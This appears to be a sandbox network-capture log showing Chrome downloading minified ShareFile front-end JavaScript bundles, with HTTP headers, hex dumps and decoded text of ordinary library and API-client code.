                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 65 66 69 6e 65 64 22 3a 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3b 63 61 73 65 22 42 6f 6f 6c 65 61 6e 22 3a 72 65 74 75 72 6e 20 72 3d 3d 3d 42 6f 6f 6c 65 61 6e 28 6c 28 65 5b 74 5d 29 3f 65 5b 74 5d 2e 6c 65 6e 67 74 68 3a 65 5b 74 5d 29 3b 63 61 73 65 22 46 75 6e 63 74 69 6f 6e 22 3a 72 65 74 75 72 6e 21 21 72 28 65 5b 74 5d 2c 74 2c 65 29 3b 63 61 73 65 22 41 72 72 61 79 22 3a 72 65 74 75 72 6e 21 21 6c 28 65 5b 74 5d 29 26 26 28 6e 3f 68 3a 66 29 28 65 5b 74 5d 2c 72 29 3b 63 61 73 65 22 52 65 67 45 78 70 22 3a 72 65 74 75 72 6e 20 6c 28 65 5b 74 5d 29 3f 21 21 6e 26 26 68 28 65 5b 74 5d 2c 72 29 3a 42 6f 6f 6c 65 61 6e 28 65 5b 74 5d 26 26 65 5b 74 5d 2e 6d 61 74 63 68 28 72 29 29 3b 63 61 73 65 22 4e 75 6d 62 65 72 22 3a 72 3d 53 74 72 69 6e 67 28
                                                                                                                                                                                                                      Data Ascii: efined":return t in e;case"Boolean":return r===Boolean(l(e[t])?e[t].length:e[t]);case"Function":return!!r(e[t],t,e);case"Array":return!!l(e[t])&&(n?h:f)(e[t],r);case"RegExp":return l(e[t])?!!n&&h(e[t],r):Boolean(e[t]&&e[t].match(r));case"Number":r=String(
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC10345INData Raw: 74 6f 55 6e 69 63 6f 64 65 28 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 74 2e 5f 70 61 72 74 73 2e 70 6f 72 74 26 26 28 72 2b 3d 22 3a 22 2b 74 2e 5f 70 61 72 74 73 2e 70 6f 72 74 29 29 3a 72 2b 3d 74 2e 68 6f 73 74 28 29 29 2c 74 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 26 26 74 2e 5f 70 61 72 74 73 2e 70 61 74 68 26 26 22 2f 22 21 3d 3d 74 2e 5f 70 61 72 74 73 2e 70 61 74 68 2e 63 68 61 72 41 74 28 30 29 26 26 28 72 2b 3d 22 2f 22 29 2c 72 2b 3d 74 2e 70 61 74 68 28 21 30 29 2c 74 2e 5f 70 61 72 74 73 2e 71 75 65 72 79 29 7b 66 6f 72 28 76 61 72 20 6e 3d 22 22 2c 6f 3d 30 2c 73 3d 74 2e 5f 70 61 72 74 73 2e 71 75 65 72 79 2e 73 70 6c 69 74 28 22 26 22 29 2c 61 3d 73 2e 6c 65 6e 67 74 68 3b 6f 3c 61 3b 6f 2b 2b 29 7b 76 61 72 20 75
                                                                                                                                                                                                                      Data Ascii: toUnicode(t._parts.hostname),t._parts.port&&(r+=":"+t._parts.port)):r+=t.host()),t._parts.hostname&&t._parts.path&&"/"!==t._parts.path.charAt(0)&&(r+="/"),r+=t.path(!0),t._parts.query){for(var n="",o=0,s=t._parts.query.split("&"),a=s.length;o<a;o++){var u


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      89192.168.2.174980913.224.189.1154437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC420OUTGET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 98732
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Wed, 25 Sep 2024 15:09:00 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:16 GMT
                                                                                                                                                                                                                      ETag: "cdca5117242386d7cabb8c5cdee3f9a1"
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 f7bf326347bdd7f275a38a22b5b83724.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: 7y8ASKvs_U6RL0i1OXQRlhb1ouyu3TfYFkRYv-caB-S3GdoIOiAmLw==
                                                                                                                                                                                                                      Age: 1
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 62 69 6c 6c 69 6e 67 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevbillingpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 2e 63 6f 6e 63 61 74 28 63 29 29 2c 28 52 7c 7c 43 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 26 26 28 76 3d 22 76 31 22 21 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 50 49 3f 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 61 70 70 65 6e 64 4e 61 6d 65 73 70 61 63 65 54 6f 4d 69 73 73 69 6e 67 4b 65 79 3f 22 22 2e 63 6f 6e 63 61 74 28 66 2c 22 3a 22 29 2e 63 6f 6e 63 61 74 28 63 29 3a 63 2c 43 3f 76 3a 76 6f 69 64 20 30 29 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 61 72 73 65 4d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 76 29 29 7d
                                                                                                                                                                                                                      Data Ascii: .concat(c)),(R||C)&&this.options.parseMissingKeyHandler&&(v="v1"!==this.options.compatibilityAPI?this.options.parseMissingKeyHandler(this.options.appendNamespaceToMissingKey?"".concat(f,":").concat(c):c,C?v:void 0):this.options.parseMissingKeyHandler(v))}
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6d 61 78 52 65 70 6c 61 63 65 73 29 62 72 65 61 6b 7d 7d 29 29 2c 65 7d 7d 2c 7b 6b 65 79 3a 22 6e 65 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3d 74 68 69 73 2c 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 7b 7d 2c 61 3d 59 28 7b 7d 2c 6f 29 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 6e 65 73 74 69 6e 67 4f 70 74 69 6f 6e 73 53 65 70 61 72 61 74 6f 72 3b 69 66 28 65 2e 69 6e 64 65 78 4f 66 28 6e 29 3c 30 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 65 2e 73 70 6c 69 74 28 6e 65 77 20 52 65 67 45 78 70 28 22 22 2e 63 6f 6e 63 61 74
                                                                                                                                                                                                                      Data Ascii: maxReplaces)break}})),e}},{key:"nest",value:function(e,t){var n,r,i=this,o=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},a=Y({},o);function s(e,t){var n=this.nestingOptionsSeparator;if(e.indexOf(n)<0)return e;var r=e.split(new RegExp("".concat
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC15255INData Raw: 28 72 26 26 22 63 69 6d 6f 64 65 22 3d 3d 3d 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 72 65 74 75 72 6e 20 6e 28 29 3b 76 61 72 20 69 3d 5b 5d 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 74 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 65 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 26 26 69 2e 70 75 73 68 28 65 29 7d 29 29 7d 3b 69 66 28 72 29 6f 28 72 29 3b 65 6c 73 65 20 74 68 69 73 2e 73 65 72 76 69 63 65 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 67 65 74 46 61 6c 6c 62 61 63 6b 43 6f 64 65 73 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 66 61 6c 6c 62 61 63 6b 4c 6e 67 29 2e 66 6f 72
                                                                                                                                                                                                                      Data Ascii: (r&&"cimode"===r.toLowerCase())return n();var i=[],o=function(e){e&&t.services.languageUtils.toResolveHierarchy(e).forEach((function(e){i.indexOf(e)<0&&i.push(e)}))};if(r)o(r);else this.services.languageUtils.getFallbackCodes(this.options.fallbackLng).for
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 65 63 74 28 6e 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28 30 2c 69 2e 41 29 28 65 2c 74 2c 6e 5b 74 5d 29 7d 29 29 3a 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 6e 29 29 3a 45 65 28 4f 62 6a 65 63 74 28 6e 29 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: ect(n),!0).forEach((function(t){(0,i.A)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):Ee(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}retu
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 2c 74 28 6e 29 7d 65 2e 65 78 70 6f 72 74 73 3d 74 2c 65 2e 65 78 70 6f 72 74 73 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3d 21 30 2c 65 2e 65 78 70 6f 72 74 73 2e 64 65 66 61 75 6c 74 3d 65 2e 65 78 70 6f 72 74 73 7d 2c 34 37 35 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 34 36 33 33 29 28 29 3b 65 2e 65 78 70 6f 72 74 73 3d 72 3b 74 72 79 7b 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 3d 72 7d 63 61 74 63 68 28 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 3d 72 3a 46 75 6e 63 74 69 6f 6e 28 22 72 22 2c 22 72 65 67 65 6e 65 72 61 74 6f 72 52 75 6e 74 69 6d 65 20 3d
                                                                                                                                                                                                                      Data Ascii: ult=e.exports,t(n)}e.exports=t,e.exports.__esModule=!0,e.exports.default=e.exports},4756:(e,t,n)=>{var r=n(4633)();e.exports=r;try{regeneratorRuntime=r}catch(e){"object"==typeof globalThis?globalThis.regeneratorRuntime=r:Function("r","regeneratorRuntime =


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      90192.168.2.174981113.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC602OUTGET /sharefile-web/sharefiledev-client-pilet/0.10.6/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 178957
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 22:57:01 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "826da847895415a16e1d242afd0f2ba7"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 38f6d324a75dff585b0ce25920fd4bda.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: IzkKwH7n5qnWju2WQBnTPD2Ji2dJKKE38bzNPdjoFNzpVw-qtf8_lw==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 63 6c 69 65 6e 74 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevclientpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,n){var t={},r={},i={},o={},a={},s={},u={},c={};return
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC15032INData Raw: 74 75 72 6e 22 71 75 65 75 65 22 3d 3d 3d 65 3f 22 70 72 65 70 65 6e 64 51 75 65 75 65 22 3a 65 3f 22 70 72 65 70 65 6e 64 22 3a 22 61 70 70 65 6e 64 22 7d 28 72 29 2c 73 3d 22 70 72 65 70 65 6e 64 51 75 65 75 65 22 3d 3d 3d 61 2c 75 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 74 79 6c 65 22 29 3b 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 24 2c 61 29 2c 73 26 26 6f 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 4b 2c 22 22 2e 63 6f 6e 63 61 74 28 6f 29 29 2c 6e 75 6c 6c 21 3d 74 26 26 74 2e 6e 6f 6e 63 65 26 26 28 75 2e 6e 6f 6e 63 65 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6e 6f 6e 63 65 29 2c 75 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 3b 76 61 72 20 63 3d 59 28 6e 29 2c 6c 3d 63 2e 66 69 72 73 74 43 68
                                                                                                                                                                                                                      Data Ascii: turn"queue"===e?"prependQueue":e?"prepend":"append"}(r),s="prependQueue"===a,u=document.createElement("style");u.setAttribute($,a),s&&o&&u.setAttribute(K,"".concat(o)),null!=t&&t.nonce&&(u.nonce=null==t?void 0:t.nonce),u.innerHTML=e;var c=Y(n),l=c.firstCh
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 69 74 65 72 61 74 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 2e 5c 6e 49 6e 20 6f 72 64 65 72 20 74 6f 20 62 65 20 69 74 65 72 61 62 6c 65 2c 20 6e 6f 6e 2d 61 72 72 61 79 20 6f 62 6a 65 63 74 73 20 6d 75 73 74 20 68 61 76 65 20 61 20 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 20 6d 65 74 68 6f 64 2e 22 29 7d 76 61 72 20 6f 2c 61 3d 21 30 2c 73 3d 21 31 3b 72 65 74 75 72 6e 7b 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 3d 74 2e 63 61 6c 6c 28 65 29 7d 2c 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 2e 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 61 3d 65 2e 64 6f 6e 65 2c 65 7d 2c 65 3a 66 75 6e 63 74
                                                                                                                                                                                                                      Data Ascii: new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var o,a=!0,s=!1;return{s:function(){t=t.call(e)},n:function(){var e=t.next();return a=e.done,e},e:funct
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC7892INData Raw: 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 64 65 6c 65 74 65 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 63 6f 6e 74 65 6e 74 2e 77 72 69 74 65 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 70 61 63 6b 61 67 69 6e 67 22 5d 29 3b 63 61 73 65 20 31 31 3a 72 2e 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3d 6f 2e 73 65 6e 74 3b 63 61 73 65 20 31 32 3a 69 66 28 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 7c 7c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 29 7b 6f 2e 6e 65 78 74 3d 31 36 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 2e 6e 65 78 74 3d 31 35 2c 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74
                                                                                                                                                                                                                      Data Ascii: ,"solutionviewengine:view.delete","solutionviewengine:viewcontent.write","solutionviewengine:view.packaging"]);case 11:r.Authorization=o.sent;case 12:if(!this.configuration||!this.configuration.accessToken){o.next=16;break}return o.next=15,this.configurat
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC8568INData Raw: 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 7c 7c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 29 7b 6f 2e 6e 65 78 74 3d 38 3b 62 72 65 61 6b 7d 72 65 74 75 72 6e 20 6f 2e 6e 65 78 74 3d 37 2c 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 28 22 4f 41 75 74 68 32 2d 54 65 73 74 22 2c 5b 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 72 65 61 64 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 77 72 69 74 65 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 2e 64 65 6c 65 74 65 22 2c 22 73 6f 6c 75 74 69 6f 6e 76 69 65 77 65 6e 67 69 6e 65 3a 76 69 65 77 63 6f 6e 74 65
                                                                                                                                                                                                                      Data Ascii: this.configuration||!this.configuration.accessToken){o.next=8;break}return o.next=7,this.configuration.accessToken("OAuth2-Test",["solutionviewengine:view.read","solutionviewengine:view.write","solutionviewengine:view.delete","solutionviewengine:viewconte
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 65 61 6b 7d 74 68 72 6f 77 20 6e 65 77 20 62 65 28 22 65 6e 63 6f 64 65 64 56 69 65 77 49 64 22 2c 27 52 65 71 75 69 72 65 64 20 70 61 72 61 6d 65 74 65 72 20 22 65 6e 63 6f 64 65 64 56 69 65 77 49 64 22 20 77 61 73 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 20 77 68 65 6e 20 63 61 6c 6c 69 6e 67 20 67 65 74 56 69 65 77 42 79 49 64 28 29 2e 27 29 3b 63 61 73 65 20 34 3a 69 66 28 74 3d 7b 7d 2c 72 3d 7b 7d 2c 6e 75 6c 6c 21 3d 65 2e 78 42 66 66 43 73 72 66 26 26 28 72 5b 22 78 2d 62 66 66 2d 63 73 72 66 22 5d 3d 53 74 72 69 6e 67 28 65 2e 78 42 66 66 43 73 72 66 29 29 2c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 7c 7c 21 74 68 69 73 2e 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 61 63 63 65 73 73 54 6f 6b 65 6e 29 7b 6f 2e 6e 65 78
                                                                                                                                                                                                                      Data Ascii: eak}throw new be("encodedViewId",'Required parameter "encodedViewId" was null or undefined when calling getViewById().');case 4:if(t={},r={},null!=e.xBffCsrf&&(r["x-bff-csrf"]=String(e.xBffCsrf)),!this.configuration||!this.configuration.accessToken){o.nex
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 74 56 69 65 77 28 7b 76 69 65 77 3a 7b 63 6f 6e 74 61 69 6e 65 72 52 49 44 3a 22 73 68 61 72 65 66 69 6c 65 3a 61 63 63 6f 75 6e 74 2d 2a 2f 70 72 65 63 6f 6e 66 69 67 75 72 65 64 2d 22 2e 63 6f 6e 63 61 74 28 6e 2e 62 6c 6f 63 6b 4e 61 6d 65 29 7d 2c 6c 61 79 6f 75 74 3a 7b 62 6c 6f 63 6b 3a 6e 7d 7d 29 2c 74 3d 65 2e 62 6c 6f 63 6b 73 2e 66 69 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 72 6f 6f 74 22 3d 3d 3d 65 2e 70 61 72 65 6e 74 5a 6f 6e 65 52 49 44 7d 29 29 3b 72 65 74 75 72 6e 5b 65 2c 74 5d 7d 29 2c 5b 6e 5d 29 2c 73 3d 28 30 2c 42 65 2e 5a 29 28 61 2c 32 29 2c 75 3d 73 5b 30 5d 2c 63 3d 73 5b 31 5d 2c 6c 3d 52 65 5b 22 64 65 66 61 75 6c 74 22 5d 2e 75 73 65 4d 65 6d 6f 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75
                                                                                                                                                                                                                      Data Ascii: tView({view:{containerRID:"sharefile:account-*/preconfigured-".concat(n.blockName)},layout:{block:n}}),t=e.blocks.find((function(e){return"root"===e.parentZoneRID}));return[e,t]}),[n]),s=(0,Be.Z)(a,2),u=s[0],c=s[1],l=Re["default"].useMemo((function(){retu
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 22 3d 3d 6e 7c 7c 22 5b 6f 62 6a 65 63 74 20 47 65 6e 65 72 61 74 6f 72 46 75 6e 63 74 69 6f 6e 5d 22 3d 3d 6e 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 73 79 6e 63 46 75 6e 63 74 69 6f 6e 5d 22 3d 3d 6e 7c 7c 22 5b 6f 62 6a 65 63 74 20 50 72 6f 78 79 5d 22 3d 3d 6e 7d 7d 2c 31 33 32 31 38 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 79 70 65 6f 66 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 22 6f 62 6a 65 63 74 22 3d 3d 6e 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 6e 29 7d 7d 2c 33 37 30 30 35 3a 65 3d 3e 7b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 22 6f 62 6a 65 63 74
                                                                                                                                                                                                                      Data Ascii: object Function]"==n||"[object GeneratorFunction]"==n||"[object AsyncFunction]"==n||"[object Proxy]"==n}},13218:e=>{e.exports=function(e){var n=typeof e;return null!=e&&("object"==n||"function"==n)}},37005:e=>{e.exports=function(e){return null!=e&&"object
